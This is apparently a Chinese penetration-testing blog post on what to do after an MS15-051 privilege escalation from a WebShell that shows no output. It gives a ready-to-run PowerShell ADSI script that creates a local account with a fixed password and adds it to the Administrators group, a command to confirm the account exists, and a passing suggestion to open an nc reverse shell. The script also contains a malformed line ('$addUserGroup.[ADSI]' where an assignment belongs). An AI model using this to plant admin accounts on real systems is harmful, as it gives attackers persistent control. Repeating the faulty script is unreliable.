Powershell 创建用户并添加到 Administrators 用户组

渗透测试 2016-07-05 14:18 暂无评论

MS15-051 提权,发现只要是 net 或者 query user 都是无回显,无法判断是否成功执行,可以考虑用 Powershell 加帐号。

因为遇到这个问题的时候还简单的判断了一下是不可能刻意做了组策略的。只能是 WebShell 的问题导致没有回显。换了好几个一样没有回显,最后只能尝试用 Powershell 了。

如果没有交互,就保存成 adduser.ps1 再执行。使用时注意 WinNT://d0cs 这里需要替换更改 d0cs 为本地计算机名,否则执行失败。

$objName = [ADSI]"WinNT://d0cs"
$addUser = $objName.Create("User", "d0cs")
$addUser.setpassword("D0CS.ORG")
$addUser.setinfo()
$addUserGroup.[ADSI]"WinNT://d0cs/administrators,group"
$addUserGroup.add("WinNT://d0cs/d0cs")

首先 ADSI 连接本地计算机名为 d0cs 的计算机,然后添加一个帐号为 d0cs 密码为 D0CS.ORG 的帐号并且将 d0cs 加入到 administrators 用户组。

查看是否成功执行添加用户:powershell Get-WmiObject -Class Win32_UserAccount

如果没有必要的话,提权完全没有问题检查过服务器没有狗也没有数字这些玩意儿。。就一些正常的 Web 服务的话,大概断定是不会存在有刻意做了组策略这些东西。因为在测试的是内网,弱口令。可以尝试 nc 反弹一个 shell 看看是否正常。如果都没办法,可以尝试一下用 powershell 的!毕竟 powershell 在 Win2008 或更高版本的 Server 系统做渗透可能会更得心应手吧。

暂无评论